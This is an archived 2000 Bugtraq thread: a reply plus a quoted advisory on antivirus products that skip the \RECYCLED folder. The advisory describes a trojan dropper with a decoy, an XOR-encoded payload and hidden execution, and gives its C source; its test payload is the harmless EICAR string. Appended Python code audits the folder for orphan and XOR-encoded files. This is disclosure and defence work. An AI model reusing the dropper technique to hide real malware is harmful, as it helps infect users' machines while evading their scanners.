Re: Bypass Virus Checking

From: Russ Johnson (rjohnsonat_private)
Date: Mon Jan 31 2000 - 16:24:35 PST


    I'm using NAV 5.02.00 with all updates and the latest definitions. I have
    NOT modified the preferences except to turn off the weekly scan of all
    files. (Such a scan is redundant to scanning files as they are executed.
    This is the "Auto-Protect" feature of NAV.)
    
    Running the executable "virusexploit0100.exe" caused NAV to alert. It saw
    the virus signature and denied access to the file. It did this from memory,
    not from a directory. If normal scanning (Auto-Protect) is turned on (as it
    is by default) then this exploit should not work in any version of NAV that
    I'm familiar with, versions 3.0 for Windows 95 and up.
    
    Russ
    
    -----Original Message-----
    From: Neil Bortnak [mailto:neilat_private]
    Sent: Sunday, January 30, 2000 9:40 PM
    To: BUGTRAQat_private
    Subject: Bypass Virus Checking
    
    
    Greetings All,
    
    I originally released this vulnerability over the Christmas holidays on
    NTBugTraq. I spoke with a member of the Security Focus staff about
    getting it onto the web site and was told that I should post the problem
    here. During our conversation we decided that I hadn't been clear in my
    last posting and that I should re-do it complete with working exploit
    and source code. I hope this one makes more sense. The new version
    follows.
    
    Best Regards,
    
    Neil Bortnak
    InfoSec & Linux Consulting
    www.bortnak.com
    
    
    1. Background
    -------------
    
    Under Win95/98 the Recycle Bin is a system designed to make it easy for
    users to "undelete" files. When a user deletes from the GUI, the file is
    not really deleted but moved to a folder named "RECYCLED" located at the
    root of that volume. If the folder does not exist, possibly because
    nothing has ever been deleted on that volume, the directory is created.
    The file is then renamed and information about the file's original name
    and location are stored in an index file. When you look at the recycle
    bin through the GUI, Windows reads the index files from each volume and
    displays their contents. It does not display a raw directory listing.
    You cannot easily access a raw directory listing through the GUI. When
    you empty the recycle bin, Windows deletes all of the files in the
    RECYCLED directories that have a corresponding entry in one of the
    indexes. Therefore a file stored in a RECYCLED directory via DOS or a
    program will not show up anywhere in the GUI and will not be deleted
    when you empty the Recycle Bin.
    
    
    2. The Problem
    --------------
    
    By default, some virus checkers exclude the files from their batch and
    on-access scanning whose pathnames begin with \RECYCLED. That is, all
    files and subdirectories within the RECYCLED folder on every volume will
    ***NEVER BE SCANNED*** for any reason. Therefore you can store and run
    malicious code from these directories without setting off the virus
    checker. Since these files wouldn't have an entry in the Recycle Bin's
    index file, they will never be deleted. It's a safe haven.
    
    
    3. Exploitation Difficulties
    ----------------------------
    
    The difficult part about making this work from an attacker's point of
    view is getting the malicious code to the \RECYCLED directory. An e-mail
    virus checker will catch it as it comes into the network, and on-access
    scanning will catch it from the floppy drive. I've worked out two
    methods for getting the files into position without setting off the
    checkers.
    
    
    3.1 Trojan with encoded payload
    -------------------------------
    
    In my proof-of-concept code, I took one of those fun little games that
    are going around and made an "installation" program for it. The program
    uses a WinZip self-installer containing 3 files: a clean version of the
    fun game (hereafter known as the decoy), a setup program and a file
    called winsetup.dll. The winsetup.dll file is in fact the malicious
    program encoded by XORing all its bytes with 25. By doing this the
    archive passes all virus checks with flying colors. This nicely bypasses
    any perimeter, e-mail, batch and on-access scans.
    
    When executed the WinZip installer extracts the files to a temporary
    directory and runs the setup program. The setup program copies the decoy
    to the user's desktop. If a \RECYCLED directory doesn't exist, the setup
    program makes one. It then opens the winsetup.dll file for reading and
    creates a new file in the \RECYCLED directory. It copies the
    winsetup.dll file into its new home 4k at a time, XORing it back to the
    original malicious executable. The setup program runs the malicious code
    in a hidden window and exits.
    
    I tested this idea using Back Orifice 2000. I configured it to install
    itself back into the RECYCLED directory after being run for the first
    time. It worked just fine. I downloaded the trojan, executed it, and
    connected to the BO2K server from another computer and none of the
    intervening virus checkers complained. That's really not supposed to
    happen.
    
    
    3.2 On a CD-ROM
    ---------------
    
    I didn't test this, but CD-ROMs are also excluded by default on some
    checkers. Someone can give it a try if they like (I haven't got a
    burner, but the theory is sound).
    
    
    4. Notes on NT
    --------------
    
    The exploit works great under NT. The anti-virus folk make the same
    exclusions with NT checkers, presumably to deal with dual boot systems.
    NT's default permissions allow this to work even when the machine is not
    dual boot and has NTFS on all drives because EVERYONE can create
    directories at the root. Just make a \RECYCLED directory and away you
    go.
    
    
    5. General Notes
    ----------------
    
    I don't see why the \RECYCLED directory is excluded. It's even more
    strange when you consider that the \RECYCLER directories ARE scanned.
    The \RECYCLER directory stores the Recycle Bin's files under NT. One
    remark I had from an AV vendor implied that it was unreasonable to scan
    files in order to catch XORed or encrypted viruses. That's probably
    true, but the whole thing works because of the exclusion of the
    \RECYCLED directory. That's the crux of the issue, the rest of the code
    just exploits the real problem.
    
    
    6. Vulnerable Scanners
    ----------------------
    
    These are the results from the checkers I have available.
    
    	McAfee Virus Scan
    	Engine: 4050
    	DATs:   4062
    	Vulnerable
    
    	Norton Anti-Virus
    	Engine: 5.01.01C
    	DATs:   01/24/00
    	Vulnerable
    
    	Norton Anti-Virus
    	Engine: 5.00.01C
    	DATs:   01/24/00
    	Not Vulnerable: Identifies EICAR.COM as Bloodhound.File.String
    
    The problem is more sinister with NAV because the \RECYCLED directory
    DOES NOT APPEAR on the exclusions list. It's hidden and can be found
    only by having a look at the preferences file with a hex editor. There
    are other hidden exclusions in that file, but I haven't had the
    opportunity to think about possible exploits yet.
    
    
    7. Solutions
    ------------
    
    With McAfee, just go into the exclusions tab and delete the \RECYCLED
    entry. You do that at your own risk of course, as I have no idea why it
    was excluded in the first place. As for NAV, I don't really have a good
    solution that doesn't involve doing creative things with a hex editor or
    installing software, which is to say that I don't have a good solution.
    
    
    8. The virusexploit0100.exe file
    --------------------------------
    
    Included in this e-mail is a working exploit for this vulnerability. If
    you run the executable and your virus checker does not complain, check
    for the existence of an EICAR.COM file in the \RECYCLED directory. The
    correct \RECYCLED directory is almost certainly on your C: drive. If it
    exists your virus checker is vulnerable.
    
    To tidy up after the test, delete the decoy.exe program file that was
    copied to your desktop and the \RECYCLED\EICAR.COM file.
    
    
    Appendix A. Source Code
    -----------------------
    
    The following source files are for the programs that come in the
    virusexploit0100.exe.
    
    
    A.1 setup.c
    -----------
    
    /* Setup program for bypassing virus checkers */
    
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <stdlib.h>
    #include <string.h>   /* strcat */
    #include <dir.h>      /* mkdir (Borland); MSVC has it in <direct.h> */
    #include <io.h>
    #include <stdio.h>
    #include <windows.h>
    
    #define DECOY_NAME "decoy.exe"
    #define SOURCE_FILE ".\\winsetup.dll"
    #define DEST_FILE "\\recycled\\eicar.com"
    #define DECOY_FILE ".\\" DECOY_NAME
    #define DECOY_DIR_KEY "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"
    #define DECOY_DIR_VAL "Desktop"
    #define BUFSIZE 4096
    #define XORME 25
    
    int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow)
    {
    int sourcefile, destfile, bytesin, i;
    char buffer[BUFSIZE], szDirName[256], szDecoyDir[512];
    long lerror;
    HKEY regkey;
    DWORD ValSize = sizeof(szDirName); /* How annoying */
    
    /* Find out where the desktop is so we can put the decoy there */
    if((lerror = RegOpenKeyEx(HKEY_CURRENT_USER, DECOY_DIR_KEY, 0, KEY_QUERY_VALUE, &regkey)) != ERROR_SUCCESS)
    	{
    	exit(0);
    	}
    /* The registry API takes an LPBYTE output buffer; the value is a REG_SZ path */
    if((lerror = RegQueryValueEx(regkey, DECOY_DIR_VAL, 0, NULL, (LPBYTE)&szDirName[0], &ValSize)) != ERROR_SUCCESS)
    	{
    	exit(0);
    	}
    RegCloseKey(regkey);
    
    
    /* Expand the dir name on the off chance it contains ENV vars */
    ExpandEnvironmentStrings(&szDirName[0], &szDecoyDir[0], sizeof(szDecoyDir));
    /* Build "<Desktop>\decoy.exe"; appending DECOY_FILE verbatim would yield "Desktop.\decoy.exe" */
    strcat(szDecoyDir, "\\" DECOY_NAME);
    rename(DECOY_FILE, szDecoyDir);
    
    
    /* It doesn't matter what mkdir's return code is. It'll make the dir if it
    doesn't exist or fail if it does */
    mkdir("\\recycled");
    
    
    /* Prepare to "decrypt" the infected executable */
    if((sourcefile = open(SOURCE_FILE, O_RDONLY | O_BINARY)) == -1)
    	{
    	exit(0);
    	}
    if((destfile = open(DEST_FILE, O_WRONLY | O_CREAT | O_EXCL | O_BINARY, S_IREAD | S_IWRITE)) == -1)
    	{
    	exit(0);
    	}
    
    /* "Decrypt" it. read() returns -1 on error, so loop only on a positive count */
    while((bytesin = read(sourcefile, &buffer[0], BUFSIZE)) > 0)
    	{
    	for(i = 0; i < bytesin; i++)
    		{
    		buffer[i] ^= XORME;
    		}
    	write(destfile, &buffer[0], bytesin);
    	}
    
    close(sourcefile);
    close(destfile);
    
    /* Run the infected executable. You would normally use SW_HIDE here. */
    WinExec(DEST_FILE, SW_SHOWNORMAL);
    return(0);
    }
    
    
    A.2 decoy.c
    -----------
    
    /*
    A lame decoy program by Neil Bortnak
    */
    
    #include <windows.h>
    
    int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow)
    {
    char message[] = "This is the decoy program. Normally you'd use a fun little game\n"
                     "or a self-playing animation of questionable taste.";
    MessageBox(NULL, &message[0], "Virus Test", MB_OK | MB_ICONINFORMATION);
    return(0);
    }
    
    
    A.3 winsetup.dll
    ----------------
    
    The unencoded form of this file is a standard EICAR.COM test string.
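
A defender's counterpart to the advisory above, added here as an example and not code from Neil's post or from any AV vendor: it audits a RECYCLED directory for entries the Recycle Bin itself would not have created (the advisory's "safe haven" files, which never appear in the GUI and are never emptied) and scans every file for a known signature under all 256 single-byte XOR keys, the encoding the setup program undoes with XORME 25. The naming convention it assumes (the Win95/98 bin renames what it stores to D<drive letter><n>.<ext> and keeps its index in INFO or INFO2) is the assumption behind the regex; the signature and the sample tree are constructed for the demo, so no EICAR string is written anywhere.

```python
"""Audit a RECYCLED directory for orphan files and XOR-encoded signatures.

Added example, not the advisory's code. The sample tree and SIGNATURE are
constructed; the Recycle Bin naming rule (D<drive><n>.<ext>, INFO/INFO2) is
an assumption about Win95/98 encoded in MANAGED_NAME and MANAGED_FIXED.
"""
import os
import re
import tempfile
from typing import Optional

# What the Win9x Recycle Bin itself creates at the top of \RECYCLED.
MANAGED_NAME = re.compile(r"^d[a-z]\d+(\.[^.\\]*)?$", re.IGNORECASE)
MANAGED_FIXED = {"info", "info2", "desktop.ini"}

# Constructed stand-in for a real detection signature (EICAR in the advisory).
SIGNATURE = b"CONSTRUCTED-TEST-SIGNATURE-DO-NOT-RUN"


def is_recycle_bin_managed(name: str) -> bool:
    """True if the Recycle Bin would have produced this top-level name."""
    low = name.lower()
    return low in MANAGED_FIXED or MANAGED_NAME.match(low) is not None


def find_xor_key(data: bytes, signature: bytes) -> Optional[int]:
    """Return the single-byte key k for which (data XOR k) contains signature.

    XORing the short signature by k and searching the untouched data is the
    same test as XORing the whole file, only far cheaper. Key 0 means the
    signature is present in the clear; None means no key matched.
    """
    for key in range(256):
        if bytes(b ^ key for b in signature) in data:
            return key
    return None


def audit_recycled(root: str, signature: bytes = SIGNATURE) -> list:
    """Walk a RECYCLED directory and report suspicious entries.

    An entry is reported if its top-level name is not one the Recycle Bin
    creates (an orphan: invisible in the GUI, never emptied) or if its
    contents match the signature under some XOR key. Files inside a
    recycled folder keep their original names, so the orphan test is
    applied to the top-level entry only.
    """
    findings = []
    for entry in sorted(os.listdir(root)):
        top = os.path.join(root, entry)
        orphan = not is_recycle_bin_managed(entry)
        paths = [top] if os.path.isfile(top) else [
            os.path.join(d, f) for d, _, files in os.walk(top) for f in files]
        for path in paths:
            with open(path, "rb") as fh:
                key = find_xor_key(fh.read(), signature)
            if orphan or key is not None:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append({"path": rel, "orphan": orphan, "xor_key": key})
    return findings


def build_sample_tree() -> str:
    """Create a constructed RECYCLED tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="recycled_audit_")

    def put(rel: str, data: bytes) -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

    put("INFO2", b"\x05\x00\x00\x00" + b"\x00" * 16)       # the bin's own index
    put("Dc1.txt", b"a document the user really deleted")  # legitimately recycled
    put("Dc2.exe", b"MZ" + SIGNATURE)                       # recycled, infected in the clear
    put("eicar.com", bytes(b ^ 25 for b in b"MZ" + SIGNATURE))  # dropped by a program, XOR 25
    put("Dc3/notes.txt", b"files in a recycled folder keep their names")
    put("stash/tool.bin", b"no signature, but the GUI never put this here")
    return root


if __name__ == "__main__":
    for finding in audit_recycled(build_sample_tree()):
        print(finding)
```

Run against the constructed tree it reports three entries: Dc2.exe (properly named, but the signature is present under key 0), eicar.com (orphan, signature recovered with key 25) and stash/tool.bin (orphan with no signature match, which is exactly the case an exclusion-honouring scanner would never look at). The XOR sweep costs 256 substring searches per file, cheap enough for a directory audit; it is the cheap answer to the vendor remark in section 5 that scanning for XORed viruses is unreasonable, at least for single-byte keys.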
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:42 PDT